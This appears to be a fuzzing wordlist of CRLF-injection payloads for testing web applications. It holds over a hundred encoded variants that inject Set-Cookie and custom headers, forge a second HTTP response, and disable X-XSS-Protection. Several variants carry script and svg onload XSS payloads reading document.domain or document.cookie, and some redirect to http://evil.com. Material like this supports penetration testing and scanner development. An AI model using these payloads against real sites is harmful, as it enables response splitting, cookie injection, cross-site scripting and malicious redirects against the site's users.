/%%0a0aSet-Cookie:crlf=injection
/%0aSet-Cookie:raph=hi;
/%0aSet-Cookie:crlf=injection
/%0d%0a%0d%0a<script>alert('XSS')</script>;
/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
/%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E
%0d%0aHost:%20{{Hostname}}%0d%0aCookie:%20raph=hi%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aSet-Cookie:%20raph=hi%0d%0a%0d%0a
/%0d%0ahost:%20www.google.com
/%0d%0ahost:%20www.google.com%0d%0a
/%0d%0aLocation:%20http://evil.com
/%0d%0aLocation:www.google.com%0d%0a
/%0d%0aSet-Cookie:raph=hi;
/%0d%0aSet-Cookie:crlf=injection
/%0dSet-Cookie:raph=hi;
/%0dSet-Cookie:crlf=injection
“%23%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a<svg/onload%3dalert%28document.domain%29>”
/%23%0aSet-Cookie:crlf=injection
/%23%0D%0ALocation:www.google.com;
/%23%0d%0aSet-Cookie:crlf=injection
/%23%0dSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
/%25%30%61Set-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
/%2F..%0d%0aSet-Cookie:crlf=injection
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
/%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr
/%3f%0d%0aLocation:%0d%0araph-x:raph-x%0d%aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
/%3f%0d%0aSet-Cookie:crlf=injection
/%3f%0dSet-Cookie:crlf=injection
/%5Cr%20Set-Cookie:raph=hi;
/%5Cr%5Cn%20Set-Cookie:raph=hi;
/%5Cr%5Cn%5CtSet-Cookie:raph%5Cr%5CtSet-Cookie:raph=hi;
/%5Cr%5Cn%5CtSet-Cookie:raph=hi;
/%5Cr%5Cnhost:%20www.google.com%5Cr%5Cn
/%5cr%5cnLocation:www.google.com
/%5Cr%5CnSet-Cookie:raph=hi;
/%5Cr%5CtSet-Cookie:raph=hi;
/%5CrSet-Cookie:raph=hi;
/%E5%98%8A%E5%98%8D%0D%0ASet-Cookie:raph=hi;
/%E5%98%8A%E5%98%8Dheader:header
/%E5%98%8A%E5%98%8DLocation:www.google.com
/%E5%98%8A%E5%98%8DSet-Cookie:raph=hi
/%E5%98%8D%E5%98%8ALocation:www.google.com
/%E5%98%8D%E5%98%8ASet-Cookie:raph=hi
/%E5%98%8D%E5%98%8ASet-Cookie:crlf=injection
/%E5%98%8D%E5%98%8ASet-Cookie:crlf=injection;
/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=raph
/\r%20Set-Cookie:raph=hi;
/\r\n%20Set-Cookie:raph=hi;
/\r\nhost:%20www.google.com\r\n
\r\nHost: {{Hostname}}\r\nCookie: raph=hi\r\n\r\nHTTP/1.1 200 OK\r\nSet-Cookie: raph=hi\r\n\r\n
/\r\nLocation:www.google.com
/\r\nSet-Cookie:raph=hi;
/\r\n\tSet-Cookie:raph=hi;
/\rSet-Cookie:raph=hi;
/\r\tSet-Cookie:raph=hi;
/%u000ASet-Cookie:raph=hi;
/%u000aSet-Cookie:crlf=injection
/www.google.com/%2E%2E%2F%0D%0Araph-x:raph-x
/www.google.com/%2F..%0D%0Araph-x:raph-x
//www.google.com/%2F%2E%2E%0D%0Araph-x:raph-x
%0AHeader-Test:raph
%0A%20Header-Test:raph
%20%0AHeader-Test:raph
%23%OAHeader-Test:raph
%E5%98%8A%E5%98%8DHeader-Test:raph
%E5%98%8A%E5%98%8D%0AHeader-Test:raph
%3F%0AHeader-Test:raph
crlf%0AHeader-Test:raph
crlf%0A%20Header-Test:raph
crlf%20%0AHeader-Test:raph
crlf%23%OAHeader-Test:raph
crlf%E5%98%8A%E5%98%8DHeader-Test:raph
crlf%E5%98%8A%E5%98%8D%0AHeader-Test:raph
crlf%3F%0AHeader-Test:raph
%0DHeader-Test:raph
%0D%20Header-Test:raph
%20%0DHeader-Test:raph
%23%0DHeader-Test:raph
%23%0AHeader-Test:raph
%E5%98%8A%E5%98%8DHeader-Test:raph
%E5%98%8A%E5%98%8D%0DHeader-Test:raph
%3F%0DHeader-Test:raph
crlf%0DHeader-Test:raph
crlf%0D%20Header-Test:raph
crlf%20%0DHeader-Test:raph
crlf%23%0DHeader-Test:raph
crlf%23%0AHeader-Test:raph
crlf%E5%98%8A%E5%98%8DHeader-Test:raph
crlf%E5%98%8A%E5%98%8D%0DHeader-Test:raph
crlf%3F%0DHeader-Test:raph
%0D%0AHeader-Test:raph
%0D%0A%20Header-Test:raph
%20%0D%0AHeader-Test:raph
%23%0D%0AHeader-Test:raph
\r\nHeader-Test:raph
 \r\n Header-Test:raph
\r\n Header-Test:raph
%5cr%5cnHeader-Test:raph
%E5%98%8A%E5%98%8DHeader-Test:raph
%E5%98%8A%E5%98%8D%0D%0AHeader-Test:raph
%3F%0D%0AHeader-Test:raph
crlf%0D%0AHeader-Test:raph
crlf%0D%0A%20Header-Test:raph
crlf%20%0D%0AHeader-Test:raph
crlf%23%0D%0AHeader-Test:raph
crlf\r\nHeader-Test:raph
crlf%5cr%5cnHeader-Test:raph
crlf%E5%98%8A%E5%98%8DHeader-Test:raph
crlf%E5%98%8A%E5%98%8D%0D%0AHeader-Test:raph
crlf%3F%0D%0AHeader-Test:raph
%0D%0A%09Header-Test:raph
crlf%0D%0A%09Header-Test:raph
%250AHeader-Test:raph
%25250AHeader-Test:raph
%%0A0AHeader-Test:raph
%25%30AHeader-Test:raph
%25%30%61Header-Test:raph
%u000AHeader-Test:raph
//www.google.com/%2F%2E%2E%0D%0AHeader-Test:raph
/www.google.com/%2E%2E%2F%0D%0AHeader-Test:raph
/google.com/%2F..%0D%0AHeader-Test:raph
